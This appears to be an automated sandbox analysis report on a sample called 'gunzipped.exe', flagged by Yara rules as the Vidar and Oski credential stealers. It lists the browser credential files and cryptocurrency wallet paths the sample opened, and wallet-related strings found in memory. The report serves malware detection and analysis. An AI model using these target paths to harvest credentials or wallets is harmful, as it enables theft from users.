Source: Yara match File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp String found in binary or memory: Electrum-LTC
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp String found in binary or memory: ElectronCashxg
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp String found in binary or memory: jaxxxE[
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: window-state.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: exodus.conf.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: info.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: passphrase.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: \\Ethereum\\
Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp String found in binary or memory: Exodus
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp String found in binary or memory: Ethereum
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: default_wallet
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp String found in binary or memory: MultiDoge
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: seed.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Remote Access Functionality:

Yara detected Oski Stealer
Source: Yara match File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR